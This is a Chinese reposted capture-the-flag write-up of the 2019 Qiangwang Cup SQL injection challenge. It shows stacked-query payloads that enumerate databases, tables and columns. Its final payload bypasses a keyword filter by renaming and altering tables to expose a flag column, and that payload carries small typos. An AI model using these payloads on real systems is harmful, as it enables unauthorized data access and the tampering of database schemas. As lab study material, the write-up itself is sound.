首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-03-05 16:36:41
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
我國的十大黃金品牌
我國的十大黃金品牌
吳老師喜歡用“性感”形容一件充滿趣味和意義的事。那連續三年做一件“性感”的事,感覺如何?今年是“金物獎”的第三年。以“尋找中國創造的新國貨力量”為初衷,懷着“打造中國品牌及産品領域的标杆獎項”的野心,金物獎這三年玩得越來越嗨:報名産品數從幾...
2026-03-05
紅薯有點發芽了還能吃嗎
紅薯有點發芽了還能吃嗎
紅薯有點發芽了還能吃嗎?即使紅薯發芽後,也不會像土豆一樣産生毒素,所以吃這樣的紅薯不會對身體健康有害,隻要把紅薯上的芽去掉,完全是可以吃的,現在小編就來說說關于紅薯有點發芽了還能吃嗎?下面内容希望能幫助到你,我們來一起看看吧!紅薯有點發芽了...
2026-03-05
陽光勵志的語錄
陽光勵志的語錄
陽光勵志的語錄?今天的早晨好美啊!天氣晴朗,天空蔚藍,而且天空中漂浮着朵朵白雲,多美啊!,接下來我們就來聊聊關于陽光勵志的語錄?以下内容大家不妨參考一二希望能幫到您!陽光勵志的語錄今天的早晨好美啊!天氣晴朗,天空蔚藍,而且天空中漂浮着朵朵白...
2026-03-05
沛縣首屆文化旅遊博覽會
沛縣首屆文化旅遊博覽會
中國網8月26日訊江蘇徐州市沛縣融合漢文化、運河文化、紅色文化等文化資源禀賦,創新開展文化産業招商,大力扶持文化企業發展,積極開展對外文化交流,精心打造文化節慶品牌,文化産業呈現蒸蒸日上的發展态勢。衆所周知,沛縣是漢高祖劉邦故裡,曆史悠久,...
2026-03-05
廣西最大降水量
廣西最大降水量
未來三天,桂東北局地仍有大暴雨到特大暴雨,廣西氣象局暴雨橙色預警和重大氣象災害(暴雨)Ⅱ級應急響應生效中。21日前暴雨持續,22日雨勢減弱。大家要注意防範強降雨可能引發的中小河流水域洪水、山洪、山體滑坡、泥石流及城鄉積澇等災害。受低渦切變和...
2026-03-05
Copyright 2023-2026 - www.tftnews.com All Rights Reserved